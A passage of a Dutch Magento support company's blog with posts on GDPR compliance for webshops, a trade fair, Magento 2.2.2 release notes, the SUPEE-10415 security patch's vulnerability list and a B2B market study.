    • 11. Indien je van plan bent persoonsgegevens te verwerken voor een ander doel dan waarvoor deze zijn verstrekt, dien je gegevensverstrekkers hiervan op de hoogte stellen en toestemming te verkrijgen alvorens je hiermee aan de slag gaat.

    Wat voor effect heeft dit op mijn Magento shop?

    De AVG vraagt organisaties een grote hoeveelheid informatie te verstrekken. Wat en welke informatie je precies dient te delen is duidelijk gespecificeerd. De “waar” en “wanneer” is echter minder duidelijk omschreven, behalve bij het vragen van toestemming. Voor overige informatieverstrekking wordt alleen gesproken over een “duidelijk vindbare plaats”. Wij raden daarom aan om, zolang de AVG hierover niks specifieert, de net opgenoemde punten op te nemen in je privacyverklaring. Meer informatie over je Privacyverklaring kun hier vinden.

    wil je meer weten over wat jij volgens de AVG allemaal op orde moet hebben in jouw Magento shop? Kijk voor meer relevante onderwerpen in onze eerste blog. Daar worden alle relevante onderwerpen behandeld. Advies op maat of andere vragen? neem gerust contact met ons op.

    meer info   of   

    Bel nu! 020 337 5961

    Mats van de SeijpDit artikel is geschreven door Mats van de Seijp, onze spin in het web als Support, Ticket Manager, Business Intelligence analyst en Blogger.

    LinkedIn

  • AVG / GDPR: Hoelang mag ik persoonsgegevens bewaren in mijn Magento shop?

    AVG-GDPR 25 mei 2018De AVG / GDPR dwingt organisaties om, aan zowel hun klanten als de autoriteiten, aan te kunnen tonen met welk doel zij persoonsgegevens voor bepaalde periodes willen bewaren. Hoe je dit dient te bepalen en wat de richtlijnen hiervoor zijn, zullen we in deze blog uitleggen.

    Bewaartermijnen voor persoonsgegevens volgens de AVG/GDPR

    In de Algemene Verordening Gegevensbescherming (AVG), ook wel bekend als de General Data Protection Regulation (GDPR), staat in richtlijn (39) dat ervoor wordt gezorgd dat de opslagperiodes van persoonsgegevens, voor het doel waarvoor deze zijn verzameld, tot een strikt minimum worden beperkt. In Artikel 5.1 (e) van de AVG wordt hier dieper op ingegaan met de uitleg dat persoonsgegevens moeten worden bewaard in een vorm die het mogelijk maakt de betrokkenen niet langer te identificeren dan voor de doeleinden waarvoor de persoonsgegevens worden verwerkt noodzakelijk is.

    Wat betekent dit precies?

    De AVG/GDPR geeft dus geen concrete bewaartermijnen aan voor persoonsgegevens. De focus ligt op het doel waarvoor je de persoonsgegevens bewaard en de beargumentering over de duur ervan. Heb je een 100 dagen retour policy (herroepingsrecht), dan is het wellicht handig om na 100 dagen te weten om welke klant en aankoop (overeenkomst) het ging. De maat van zijn trui heb je, afhankelijk van het doel waarvoor je die hebt gekregen, waarschijnlijk minder lang nodig. Je dient dus goed te kunnen beargumenteren hoelang de gegevens van jouw klanten bewaard worden en wat het doel hiervoor is.

    Dit gaat echter om een strikte minimum van opslagperiodes van persoonsgegevens. Het is dus wel mogelijk om gegevens langer te bewaren mits de persoonsgegevens geanonimiseerd kunnen worden en daarmee dus niet meer de directe en indirecte identificatie van een persoon mogelijk maken. Artikel 89 geeft ook uitzonderingen aan voor archivering, algemeen belang, wetenschappelijk of historisch onderzoek of statistische doeleinden. Verwerkt uw Magento shop gegevens voor zulke doeleinden dan kunt u dit aangeven in uw privacyverklaring.

    Wat betekent dit voor mijn Magento shop?

    Nu u inzicht heeft in de eisen van de AVG / GDPR moet dit geoperationaliseerd worden. Hieronder zijn drie stappen waar u tenminste rekening mee dient te houden.

    • 1. Het in kaart brengen van de bewaartermijnen
      • Zorg dat je per verwerking in kaart brengt hoelang je bepaalde gegevens (afhankelijk van het doel waarvoor je ze verzamelt) mag bewaren. Het is belangrijk dat je omschrijft welke verwerkingen er zijn en wat de doeleinden zijn voor de bewaartermijnen.
    • 2. Processen opstellen
      • Zorg dat er processen zijn die ervoor zorgen dat jou tijdig informeren over gegevens die verwijderd moeten worden of zorg ervoor dat deze informatie, na verloop va het bewaartermijn, automatisch worden verwijderd. Het is belangrijk dat dit goed en consequent gebeurd. Immers, de autoriteiten kunnen jou vragen dit aan te tonen. Voor de juiste tips om dit technisch en organisatorisch te borgen kun je een kijkje nemen op de pagina van Privacy by Design.
    • 3. Informeren
      • Informeer je klanten over je bewaartermijnen, de doelen van deze termijnen, wat er na deze termijnen gebeurd. Je doet er goed aan om al deze informatie op te nemen in je privacyverklaring.

    wil je meer weten over wat jij volgens de AVG allemaal op orde moet hebben in jouw Magento shop? Kijk voor meer relevante onderwerpen in onze eerste blog. Daar worden alle relevante onderwerpen behandeld. Advies op maat? neem gerust contact met ons op.

    meer info   of   

    Bel nu! 020 337 5961

    Mats van de SeijpDit artikel is geschreven door Mats van de Seijp, onze spin in het web als Support, Ticket Manager, Business Intelligence analyst en Blogger.

    LinkedIn

  • AVG / GDPR: Moet mijn Magento shop een Data protection Officer (DPO) aanstellen?

    AVG-GDPR 25 mei 2018De Data Protection Officer (DPO) is een persoon met voldoende kennis over de Algemene Verordening Persoonsgegevens (AVG), Ook wel General Data Protection Regulation (GDPR) genoemd. De DPO houdt hierdoor toezicht op de interne naleving van de AVG binnen zijn organisatie. Hiervoor moet een DPO dus voldoende kennis hebben van AVG, hoe zijn organisatie persoonsgegevens verwerkt en moet hij zijn taken onafhankelijk kunnen uitoefenen.

    We hebben besloten om de taken en verplichtingen van de Data Protection Officer (DPO) als laatst te bewaren en meteen antwoord te geven op de grote vraag:

    Heb ik een DPO nodig voor mijn Magento shop?

    Er bestaat een grote kans dat je niet verplicht bent een DPO aan te stellen. Het oorspronkelijke wetsvoorstel is aangepast waardoor minder organisaties binnen de criteria vallen. Wanneer moet je dan wel een DPO aanstellen? Volgens artikel 37 van de AVG, of GDPR, is het aanstellen van een Data Protection Officer verplicht wanneer:

    • 1. De verwerking van gegevens wordt verricht door een overheidsinstantie of overheidsorgaan.
    • 2. Wanneer jouw Magento shop hoofdzakelijk is belast met gegevensverwerkingen die vanwege hun aard, hun omvang en/of hun doeleinden regelmatige en stelselmatigeobservatie op grote schaal van betrokkenen vereisen. Enige uitleg over deze termen:
      • Hoofdzakelijk: betekent dat dit een kerntaak is van de organisatie, noodzakelijk om de hoofdactiviteiten van de organisatie te kunnen uitvoeren. Als deze gegevens noodzakelijk zijn voor het uitvoeren van je hoofdactiviteiten (bijv. een huisarts die medische gegevens nodig heeft om jou te helpen). Is de verwerking dus ook een hoofdactiviteit.
      • Regelmatige observatie: Wordt omschreven als het voortdurend of periodiek, op gezette tijden, herhaaldelijk verwerken van persoonsgegevens.
      • Stelselmatige observatie: Wordt omschreven als het volgens een systeem, georganiseerd, in het kader van een plan, of uitgevoerd onderdeel van een strategie volgen van consumenten.
      • Grote schaal: Wordt niet gedefinieerd in de AVG. Hier hopen wij snel antwoord op te krijgen.
      • Voorbeeld: emailtargeting, kredietbeoordelingen en andere grootschalige marketingactivieiten
    • 3. Jouw Magento shop hoofdzakelijk is belast met grootschalige verwerking van bijzondere categorieën van gegevens.
      • Bijzondere categorieën van gegevens: Dit zijn gevoelige gegevens zoals politieke opvattingen, gezondheid, godsdienst en seksuele voorkeur. Het verwerken van deze gegevens is vaak verboden. Indien hier toch een gegronde reden voor is, bijvoorbeeld door de de aard van bepaale werkzaamheden, dient de organiatie een DPO aan te stellen.

    Als Magento shop eigenaar zullen met name de laatste twee criteria voor jou van belang zijn. Mocht je aan een van deze criteria voldoen dan kun je hieronder alvast lezen wat de taken van jouw aan te stellen DPO zijn.

    Wat zijn de taken en verplichtingen van de Data Protection Officer (DPO)?

    In Artikel 39 van de Algemene Verordening Gegevensbescherming (AVG) staan de taken en verplichtingen van de DPO als volgt omschreven:
    Taken als volgt omschreven in Artikel 39 sub a/e:

    • 1. Art 39 sub a. Het informeren en adviseren over de verplichtingen uit de AVG aan de webshop, werknemers en gegevensverwerkers. Zoals:
      • a. Het kunnen aantonen en waarborgen dat gegevensverwerking in overeenstemming met de AVG regelgeving gebeurt.
        • De DPO zorgt ervoor dat alle gegevensverwerkingen in jouw Magento shop volgens AVG regelgeving geschieden en dat dit aangetoond kan worden aan de autoriteiten.
      • b. Hiervoor de juiste maatregelen en processen op toepast.
        • Is alles in de organisatie, de back-end en de front-end van jouw Magento shop dusdanig vormgegeven dat alles voldoet aan de AVG normen en eisen?
      • c. De maatregelen en processen up to date houd volgens de meest actuele AVG regelgeving.
        • Bij aanpassingen in de AVG zorgt de DPO ervoor dat jouw organisatie en Magento shop hieraan voldoet
      • d. Een gegevensbeschermingsbeleid maken.
    • 2. Art 39. Sub b. De DPO zorgt voor het toezien en naleving van de Algemene Verordening Gegevensbescherming (AVG) en het gegevensbeschermingsbeleid. Hier valt ook onder;
      • a. Toewijzen van verantwoordelijkheden
      • b. Bewustmaking en opleiding van de bij de verwerking betrokken personeelsleden en betreffende audits.
    • 3. Art 39 sub c. Het verstrekken van advies m.b.t. de gegevensbeschermingseffect-beoordeling en toezien op de uitvoering daarvan.
    • 4. Art 39 sub d. Optreden als contactpunt voor toezichthouders
    • 5. Art 39 sub e. De DPO houdt rekening met de risico’s, de aard, de omvang, de context en verwerkingsdoeleinden van de te verwerken gegevens bij de uitvoering van zijn taken.

    Niet iedere Magento shop heeft dus een DPO nodig. Wel is het raadzaam om te kijken naar de taken van de DPO. Immers, er moet voor implementatie en naleving van de AVG regelgeving worden gezorgd.

    Wil jij weten of je een Data Protection Officer moet aanstellen voor jouw Magento shop of hoe je diens taken kunt implementeren in de organisatie? Neem gerust contact met ons op.

    Wil je meer weten over wat jij volgens de AVG allemaal op orde moet hebben in jouw Magento shop? Kijk voor meer relevante onderwerpen op deze blog.

    meer info   of   

    Bel nu! 020 337 5961

    Mats van de SeijpDit artikel is geschreven door Mats van de Seijp, onze spin in het web als Support, Ticket Manager, Business Intelligence analyst en Blogger.

    LinkedIn

  • Toestemming en het recht van bezwaar volgens de AVG / GDPR

    AVG-GDPR 25 mei 2018In onze eerste blog over “de effecten van de Algemene verordening gegevensbescherming (AVG) op Magento shops” zijn enkele belangrijke aspecten naar voren gekomen die voor 25 mei 2018 op orde moeten zijn. In dit artikel gaan we dieper in op twee van deze aspecten.

    • Het vragen van toestemming
    • Het recht op bezwaar

    Toestemming en het recht van bezwaar volgens de AVG/GDPR

    Voor het verwerken van persoonsgegevens dient er volgens de AVG/GDPR sprake te zijn van een wettelijke basis die deze actie rechtvaardigt. Toestemming is hier natuurlijk een groot onderdeel van maar er zijn meer grondslagen die dit rechtvaardigen. Waar moet ik toestemming voor vragen en wat voor effect heeft dit op mijn Magento shop?

    Moet ik volgens de AVG/GDPR overal toestemming voor vragen?

    Nee, dat hoeft niet. Maar het zal vanaf 25 mei 2018 wel een groot onderdeel worden omtrent persoonsgegevens bewerking. Het nodig hebben van toestemming is vooral gericht op (her)-gebruiken van persoonsgegevens voor bijvoorbeeld marketingdoeleinden. Maar er zijn dus ook gevallen waar geen toestemming van de consument voor nodig is. Op basis hiervan mag je persoonsgegevensverzamelen:

    • Toestemming van de gebruiker
    • Vitale belangen
    • Wettelijke verplichting
    • Overeenkomst
    • Algemeen belang
    • Gerechtvaardigd belang

    Hieronder enkele voorbeelden om dit te verduidelijken:

    Voorbeeld 1
    Stel, je hebt een online slijterij en verkoop dus alcohol op je webshop. Als verantwoordelijke ondernemer heb jij een leeftijdscontrole op je Magento shop geplaatst. Nu zou elke minderjarige die geen toestemming geeft om zijn persoonsgegevens (leeftijd) te delen dus toegang kunnen krijgen, dit kan natuurlijk niet. Je doet moeite om ervoor te zorgen dat alleen volwassen alcohol kunnen kopen en jouw klanten dienen hiervoor, zonder hun toestemming, hun leeftijd voor op te geven . Je hebt een wettelijke basis die deze actie rechtvaardigt en dus geen toestemming nodig voor het verwerken van deze (leeftijd) persoonsgegevens. Wil je deze data gebruiken voor marketingdoeleinden zoals bijvoorbeeld de leeftijden aan soorten drank koppelen voor gerichte acties? Dan dien je hier wel toestemming voor te vragen.

    Voorbeeld 2
    Als een klant dan toch die mooie fles whisky heeft besteld heb jij nog meer informatie nodig dan alleen zijn leeftijd, namelijk zijn adres. Immers, bij elke besteding boven de 20,- zorg jij dat deze fles gratis wordt bezorgd, je wilt graag goede service bieden. Zonder deze gegevens kun jij jouw deel van de overeenkomst niet uitvoeren en heb je voor het verzamelen van deze gegevens geen toestemming nodig. Wederom, wil je het adres van je klant gebruiken voor andere doeleinden dan het leveren van zijn fles Single Malt, dien je hier wel toestemming voor te krijgen.

    Het komt er op neer dat er vooral veel transparantie naar de gebruiker wordt geëist over het gebruik van zijn persoonsgegevens en op welke grond je deze verzamelt

    Recht van bezwaar

    Volgens de Algemene verordening gegevensbescherming (AVG), of General Data Protection Regulation (GDPR), heeft de consument op elk moment het recht om bezwaar te maken tegen de verwerking van zijn gegevens. Je dient dan de gegevensbewerking van de betrokkene te staken. Er zijn enkele uitzonderingen waarbij er gerechtvaardigde gronden zijn die hoger wegen dan de rechten en vrijheden van de betrokkene. Wanneer het gaat om direct marketing heeft de consument altijd het recht om bezwaar te maken. In dit geval maakt het ook niet uit of er eerst toestemming is gegeven.

    Wat moet ik nu in mijn Magento shop doen?

    Samengevat moeten jouw bezoekers dus:

    • Toestemming kunnen geven voor het verwerken van (de meeste) van hun persoonsgegevens
    • De optie hebben om hun toestemming te kunnen intrekken
    • Een plek hebben waar precies uitgelegd staat wat er met hun gegevens gebeurd en wat hun rechten zijn
    • Jou kunnen aanspreken op de nette opvolging van deze zaken

    Om hier aan te voldoen zal je op front-end en back-end gebied van je Magento shop enkele aspecten op orde moeten hebben.

    AVG (GDPR) en Magento front-end aanpassingen

    Op Magento front-end gebied draait het allemaal om jouw klanten zo goed mogelijk te informeren. Zorg dat jouw klanten bij elk proces waar ze persoonsgegevens moeten opgeven, de optie krijgen om hier toestemming voor te geven. Vermeld hierbij duidelijk waar de gegevens (uitsluitend) voor gebruikt worden en dus ook waar ze niet voor gebruikt gaan worden. Doe dit ook bij persoonsgegevens waar geen toestemming voor nodig is (zie voorbeelden hierboven).

    Voor elke toestemming die jouw klant geeft, heeft deze ook het recht om hier ( ook achteraf) bezwaar tegen te maken, voornamelijk tegen het verdere gebruik van gegevens voor marketingdoeleinden. Zorg ervoor dat dit altijd duidelijk wordt vermeld, dat de organisatie hier altijd gehoor aan moet geven en dat het intrekken van toestemming een even makkelijk proces is als het geven ervan.

    Verder moet er een plek zijn waar de klant al zijn rechten en informatie over wat er wel en niet met zijn gegevens gebeuren, overzichtelijk kan terugvinden. In de wet spreekt men hier over een “ duidelijk vindbare plaats”. Meer informatie over dit onderwerp kunt u vinden in het artikel “Informatieverplichting

    AVG (GDPR) en Magento back-end aanpassingen

    In de Magento back-end focussen we ons nu op de bewijslast. Immers, wanneer er een verplichting is om toestemming te vragen, is het van belang dat je dit ook kunt aantonen. Bij het ontbreken hiervan, overtreed je in feite al de wet en riskeer je een boete krijgen. Ook moet aangetoond kunnen worden dat een klant zijn toestemming heeft ingetrokken.

    Voor het verwerken van persoonsgegevens van minderjarigen is toestemming van de ouders nodig. In Nederland is deze leeftijd gezet op 16 jaar maar andere landen in de EU mogen deze leeftijdsgrens zelf aanpassen. Wel is 13 jaar de minimum leeftijd. Het is voor webshops onmogelijk om te controleren of er ook daadwerkelijk toestemming is gegeven door de ouders. Wel wordt verwacht dat jij kunt aantonen een redelijke inspanning te hebben gedaan om te controleren of de ouders toestemming hebben gegeven. Zorg dat dit dus goed gedocumenteerd word.

    wil je meer weten over wat jij volgens de AVG allemaal op orde moet hebben in jouw Magento shop? Kijk voor meer relevante onderwerpen op onze eerste blog. Daar worden alle relevante onderwerpen behandeld. Advies op maat? neem gerust contact met ons op.

    meer info   of   

    Bel nu! 020 337 5961

    Mats van de SeijpDit artikel is geschreven door Mats van de Seijp, onze spin in het web als Support, Ticket Manager, Business Intelligence analyst en Blogger.

    LinkedIn

  • De Webwinkel vakdagen 2018

    webwinkel vakdagen 2018De Webwinkel Vakdagen is uitgegroeid tot het belangrijkste E-commerce event van de Benelux en zal op 24 & 25 januari 2018 voor de twaalfde keer plaatsvinden in de Jaarbeurs te Utrecht. Met vorig jaar een recordaantal bezoekers van 11.176 beursgangers, volgt dit jaar een nieuwe editie dat veel gaat beloven.

    Met ruim 265 e-commerce leveranciers op de beursvloer en meer dan 400 gastsprekers ben jij bij de Webwinkel Vakdagen 2018 op de juiste plek om alles te weten te komen hoe jij rendement uit jouw online business kunt halen.

    Wil jij weten wat voor effect de nieuwe Algemene Verordening gegevensbescherming(AVG/GDPR) heeft op jouw Magento webshop en wat dit voor nieuwe kansen biedt? Bezoek eens een van 7 Privacy & AVG gerelateerde talks.

    Net de beste E-mail Service Provider (ESP) gevonden voor jouw Magento shop maar niet tevreden over de conversie van je emails? Ook hier worden 8 talks aan toegewijd. Zo weet jij dadelijk weer wat de nieuwste email marketing trends en zit je boordevol inspiratie om jouw email marketing strategie te verbeteren.

    B2B is een hot topic tegenwoordig, iedereen wil een stukje meepikken van deze groeiende markt. Bezoek eens 1 van de 10 gerelateerde talks om erachter te komen wat de beste B2B strategie voor jou is of hoe jij het beste jouw B2C markt kunt combineren met B2B.

    Meer informatie over het programma en de sprekers kun je hier vinden.

    SupportDesk is natuurlijk ook aanwezig bij de Webwinkel Vakdagen. Zien we je daar?

    meer info   of   

    Bel nu! 020 337 5961

    Mats van de SeijpDit artikel is geschreven door Mats van de Seijp, onze spin in het web als Support, Ticket Manager, Business Intelligence analyst en Blogger.

    LinkedIn

  • Magento 2.2.2. release

    magento-upgrade12 december 2017 kwam Magento met een nieuwe update uit voor de Open Source (OS) en Commerce (C) editie, Magento 2.2.2. Deze update bevat veel nieuwe tools, uitbreidingen en verbeteringen. Er is in deze update veel gefocust op het verbeteren van de online klantervaring, het genereren van nog meer nieuwe inzichten en het payment proces. hieronder een samenvatting van de belangrijkste onderdelen van de nieuwe update.

    Nieuwe Magento 2.2.2. features

    • Nieuwe geavanceerde rapportages van Magento Business Intelligence.
      • Toegang tot eenvoudig te gebruiken bestelling-, product- en klantrapporten rechtstreeks vanuit de Magento Admin voor nieuwe inzichten te krijgen en data gedreven beslissingen.
    • Magento shipping
      • De nieuwe functie biedt geïntegreerde geavanceerde multicarrier verzending en orderafhandeling opties.
    • Gestroomlijnde “ instant checkout” optie.
      • De nieuwe instant checkout optie gebruikt eerder opgeslagen betalings- en verzendinformatie om stappen in het afrekenproces te omzeilen.
    • Integratie van Dotmailer.
      • Dotmailer marketing automation software is geintegreerd in de core van Magento.
    • Magento Functional Testing Framework (MTFT). Het Magento Function Testing Framework (MFTF) is een open-source, platformonafhankelijke testoplossing. Het doel hiervan is om functioneel testen te vergemakkelijken en inspanningen omtrent regressietesten te minimaliseren.

    Belangrijkste verbeteringen van Magento 2.2.2.

    • Verbeteringen voor betaalmethoden.
      • Er is ondersteuning voor de Indiase roepie (INR) toegevoegd aan de Paypal Express checkout.
      • Er is een oplossing toegevoegd die de problemen van (sommige) restituties van Braintree verhelpt.
    • Verbeteringen voor Magento shops met multi-storeviews.
      • Het meerdere keren van storeview wisselen resulteert niet meer in een fout in de shop weergave.
    • Nieuwe functies voor de Command-line interface.
      • Er is interactiviteit toegevoegd aan de “admin:user:create” opdracht en de mogelijkheid toegevoegd om CLI-instellingen interactief (met prompts) af te handelen.
    • Je kunt nu de Enter-toets gebruiken (naast een muisklik) om in de Admin tabellen te zoeken
    • Magento maakt geen dubbele zendingen meer aan wanneer men zendingen met gebundelde producten aanmaakt.

    Er zijn bijna honderd verbeteringen en uitbreidingen doorgevoerd in deze update. Meer specifieke informatie over de update kunt u lezen in de Magento 2.2.2 Release notes.

    Wij raden onze klanten zo spoedig mogelijk te updaten.
    Wij helpen daar graag bij! Mail ons via ons supportaanvraagformulier of bel ons op 020-3375961

    meer info   of   

    Bel nu! 020 337 5961

    Mats van de SeijpDit artikel is geschreven door Mats van de Seijp, onze spin in het web als Support, Ticket Manager, Business Intelligence analyst en Blogger.

    LinkedIn

  • Magento Security Update SUPEE-10415

    security releaseOnlangs heeft Magento een nieuwe patch vrijgegeven, de SUPEE-10415 patch. Deze patch dicht een 11-tal belangrijke veiligheidslekken voor Magento Commerce 1.14.3.7 en Magento Open Source (OS) 1.9.3.7. De patches en upgrades zijn beschikbaar voor Magento Open Source vanaf versie 1.5 en vanaf 1.9 voor Magento Commerce.

    Wat zijn de 11 lekken van SUPEE-10415?

    • APPSEC-1330: Unsanitized input leading to denial of service
    • APPSEC-1885: Stored XSS in Product Descriptions
    • APPSEC-1892: Stored XSS in Visual Merchandiser
    • APPSEC-1894: Remote Code Execution by leveraging unsafe unserialization
    • APPSEC-1897: Fix WSDL based patching to work with SOAP V1
    • APPSEC-1913: Remote Code Execution through Config Manipulation
    • APPSEC-1914: Stored XSS in CMS Page Area
    • APPSEC-1915: Remote Code Execution in CMS Page Area
    • APPSEC-1325: Stored XSS in Billing Agreements
    • APPSEC-1830: PHP Object Injection in product attributes leading to Remote Code Execution
    • APPSEC-1861: PHP Object Injection in product entries leading to Remote Code Execution

    Belangrijk!

    • gebruik altijd de laatste versie van CE (Magento Open Source) (1.9.3.7)/ EE (Magento Commerce) (1.14.3.7) om zo de nieuwste verbeteringen, features en beveiligingsupdates te krijgen.

    Wat moet ik doen om Magento Security issues te bestrijden?

    Wij raden onze klanten aan zo spoedig mogelijk te patchen.

    Wij doen dat graag voor u. Mail ons via ons supportaanvraagformulier of bels ons 020 337 59 61.

    Via de Magento download website is het mogelijk de Magento security patch SUPEE-10415 te installeren. Maak altijd eerst een back-up van de database en bestanden alvorens u de patch implementeert.

    meer info   of   

    Bel nu! 020 337 5961

    Mats van de SeijpDit artikel is geschreven door Mats van de Seijp, onze spin in het web als Support, Ticket Manager, Business Intelligence analyst en Blogger.

    LinkedIn

  • Magento in de B2B Ecommerce markt


    Magento B2BIn het derde kwartaal van 2017 publiceerde onderzoeksbureau Frost & Sullivan een onderzoek over de B2B E-commerce platform markt in Amerika. Gezien de ontwikkelingen en functionaliteiten van Magento B2B grotendeels, als niet alles, ook van toepassing zijn in Europa, pakken wij hier de belangrijkste bevingerden uit. Hoe staat volgens dit prestigieuze onderzoeksbureau Magento B2B er nu voor in de B2B platform markt?

    Het onderzoek naar de B2B Ecommerce markt

    Het doel van het onderzoek is om inzicht te geven waar de 12 grootste B2B platformen in de E-commerce markt staan. Het landschap van de B2B markt wordt vormgegeven aan de hand van twee factoren:

    1. De mate van marktaandeel (X-as)
    2. De mate van strategische positionering voor toekomstige groei (Y-as)

    Onder strategische positionering vielen meerdere factoren. Er zijn uiteindelijk 8 factoren meegenomen die het huidig en toekomstig succes bepalen van een B2B platform:

    • 1. Focus op B2B. Veel organisaties focussen zich op teveel B2C of hebben van hun B2C product, aan de hand van enkele add ons, er een B2B product van gemaakt. Gezien de complexiteit van de B2B markt scoorden organisaties punten die B2B als aparte oplossing aanboden of als een geüpdatete B2C versie echt op B2B toegespitst was.
    • 2. Diepte en diversiteit in producten. Gezien de B2B markt steeds meer klant gefocust wordt en digitale oplossing wilt, scoorden organisatie punten wanneer deze extra componenten aanboden/integreerden zoals native CRM, CMS en marketing tools.
    • 3. Total Cost of Ownership (TCO). Lage kosten of verschillende kosten bij verschillende diensten werd gezien als groot competitief voordeel.
    • 4. Workflow: B2B workflows zijn complex en betrokken bij veel verschillende onderdelen zoals contact; prijzen opties, productconfiguraties en orderbeheer. Daarom is de mogelijkheid om deze processen te bewerken of nieuwe workflows snel en efficiënt aan te maken een competitief voordeel. Platformen met complexe interne workflow procesopties scoorden hoog op dit onderdeel.
    • 5. Product attributen. Op het gebied van klantervaring probeert de B2B markt steeds op te pikken van de B2C wereld. Daarom scoorden platformen hoog die veel product attributen hadden voor een betere klantervaring zoals geavanceerde product details, navigatie hulp, request for Quote (RFQ) opties en Configure price Quote (CPQ) opties. Te zien is dat geavanceerde zelfservice opties hierin centraal staan, welke een grote drijfveer is in de B2B markt.
    • 6. Gebruikersomgeving. De B2B systemen en processen zijn complex maar een goede gebruikservaring voor klanten en werknemers eist simpliciteit. Een simpele gebruikersomgeving bespaart kosten, tijd, training en frustraties. Platformen die hieraan voldeden scoorden hoog op dit onderdeel.
    • 7. Implementatietijd. Met een continue groeiende stapel aan technologieën voor de B2B markt, neemt de vraag toe voor naadloze en snelle integraties tussen systemen. dergelijke implementaties kunnen op platformen wel 8 weken tot 6 maanden duren, afhankelijk van partners en complexiteit. Hoewel je geen eenduidige lijn kunt trekken op dit soort trajecten konden organisatie hoog scoren op: 1. Een oplossing voor een algemene snelle implementatie tijd. 2. Een basisproduct met de core functies terwijl op de achtergrond meer werk gedaan kon worden zonder dat dit de organisatie aantast.
    • 8. Systeem integraties (SI) en Partner ecosysteem. Partners en SI’s zijn zitten vaak in het communicatiekanaal, tussen de B2B organisatie en klant. Hier assisteren ze vaak met bugs, upgrades en aanvragen en voegen zo dus een grote waarde toe aan het platform. Een platform die gevestigde partners SI’s hebben, met een goede reputatie en expertise, scoort hoog op dit onderdeel.

    Magento B2B in US B2B platform market

    Magento in de B2B markt

    Magento staat op het B2B platform landschap getekend als een Emerging Participant/Contender. Het marktaandeel is nog relatief klein in de B2B markt wat resulteert dat het platform ver links op de Y-as staat. Wat betreft de X-as presteert Magento een stuk beter. Beter scorend dan Salesforce en Digital River heeft Magento zich in korte tijd in de buurt van IBM en Oracle weten te positioneren, op het gebied van strategische B2B functionaliteiten en positionering. Het grote eco systeem met +270 partners en de geavanceerde Business Intelligence functies waren de unique selling points van Magento voor dit onderzoek.

    Toekomst van Magento B2B

    Sinds de lancering van Magento 2 heeft het platform veel te verduren gehad. De laatste twee jaar was Magento ook veel bezig met het oplossen van diverse problemen en het herstellen van het imago. Echter, het laatste half jaar is Magento back on track en staan ons veel interessante ontwikkelingen te wachten zoals:

    • Integratie van Bluefoot in Magento 2 Commerce B2B
    • Magento Social ontwikkelingen voor Magento 2
    • Continue ontwikkeling van Magento Business Intelligence (BI)
    • Verbeteringen in het Deployment proces voor Magento B2B
    • Samenwerking tussen Magento en Google
    • Versterken van de Magento Community

    De lage positionering op de Y-as en de middelmatige score op de X-as bleek nog voornamelijk een nasleep van de Magento 2 start. Nu het Magento 2 platform steeds stabieler is geworden, het vertrouwen terug is en er veel nieuwe ontwikkelingen en partners op komst zijn zal er voor volgend jaar een grote verschuiving plaatsvinden. Op het gebied van strategische positionering is Magento B2B druk bezig op alle onderdelen van het onderzoek flinke ontwikkelingen door te voeren. Met deze doorvoeringen zal Magento B2B een stuk hoger scoren op de X-as.

    Op het gebied van Marktaandeel (Y-as) zijn er veel B2C organisaties die ook een stap gaan maken aar B2B. Als grootste platform op de B2C markt kan Magento via deze nieuwkomers veel markt kapitaliseren, voornamelijk bij B2C organisaties die al op het Magento platform zitten. Met veel nieuwkomers vindt er ook sneller verzadiging plaats van de markt. Een goede positie op het gebied van Business Intelligence is hierin een groot voordeel voor organisaties die nieuwe trends en segmenten proberen te vinden. Hoewel de concurrentie niet stilstaat ligt een deel van het succes van Magento B2B aan de snelheid en consistentie en degelijkheid waarmee Magento dit jaar ontwikkelingen doorvoert. De tijd zal het leren.

    Wilt u weten of Magento B2B wel geschikt voor u is of heeft u Magento Support nodig voor uw Magento 2 B2B webshop? Neem gerust contact met ons op.

    meer info   of   

    Bel nu! 020 337 5961

    Mats van de SeijpDit artikel is geschreven door Mats van de Seijp, onze spin in het web als Support, Ticket Manager, Business Intelligence analyst en Blogger.

    LinkedIn

  • Impact Algemene Verordening Gegevensbescherming (AVG / GDRP) op Magento webshops


    AVG-GDPRAl een tijdje hangt de komst van de nieuwe Algemene verordening gegevensbescherming (AVG) in de lucht, ook wel bekend als General Data Protection Regulation (GDPR). Vorig jaar aangenomen door het Europees parlement en nu moeten op 25 mei 2018 alle webshops in Europa aan de nieuwe regels voldoen. Het doel van de nieuwe verordening is helder omschreven maar wat voor effect heeft dit op jouw Magento webshop en wat wordt er van jou als webwinkel eigenaar verwacht? Aan de hand van meerdere blogs brengen wij dit voor jou in kaart.

    Waarom de Algemene verordening gegevensbescherming (AVG/GDPR)

    De wet voor de AVG, de Wet bescherming persoonsgegevens (Wbp) stamt nog uit 1995. We hoeven niet uit te leggen dat in de tussentijd veel veranderd is en dat nieuwe regels noodzakelijk waren.
    Het doel van de nieuwe verordening is helder en klinkt vrij simpel, in het kort wordt er meer gericht op:

    • Versterking en uitbreiding van privacyrechten van de consumenten
    • Meer verantwoordelijkheid voor organisaties
    • Harmonisatie van de privacywetgeving in Europa
    • Harmonisatie van bevoegdheden voor privacy-toezichthouders in Europa

    Voor wie geldt de AVG/GDPR?

    De verordening is van toepassing op alle organisaties die persoonsgegevens verwerken binnen de EU. Hier vallen logischerwijs alle organisaties binnen de EU onder maar, in sommige gevallen, ook organisaties erbuiten. Richt een webshop in China zich op de Europese markt en verwerkt deze data van consumenten? Dan heeft die organisatie zich ook te houden aan de verordening. De verordening is dus van toepassing op heel veel organisaties.

    AVG/GDPR en het verwerken van persoonsgegevens voor (Magento) webshops

    Omtrent het verwerken van persoonsgegevens wordt er nogal wat van je verwacht als webshop eigenaar. In het kader van transparantie mogen persoonsgegevens alleen nog maar verwerkt worden op een open en transparante manier met een wettelijke grondslag. Er dient dus goed nagedacht te worden welke persoonsgegevens je wilt verzamelen, hoe je dit verzamelt en voor welk doel. Een beetje voordehand liggend maar het zonder toestemming doorverkopen van persoonsgegevens is dus uit den boze. Het verwerken van persoonsgegevens strekt zich echter verder in de AVG; Ook het zelf verzamelen, inzien, opslaan en vernietigen vallen onder het verwerken van persoonsgegevens. De AVG/GDPR is dus heel snel bij jou als webwinkeleigenaar van toepassing.

    Belangrijkste onderdelen uit de AVG/GDPR

    De AVG is groot ( 100 pagina's en 99+ artikelen) en kent veel regels en richtlijnen waar webshops zich aan moeten houden om boetes te voorkomen. SupportDesk heeft een expert die door al deze pagina's spit en ervoor zorgt dat jij volledig op de hoogte bent. In de komende maand volgen er daarom blogs die antwoord geven op de volgende onderwerpen:

    meer info   of   

    Bel nu! 020 337 5961

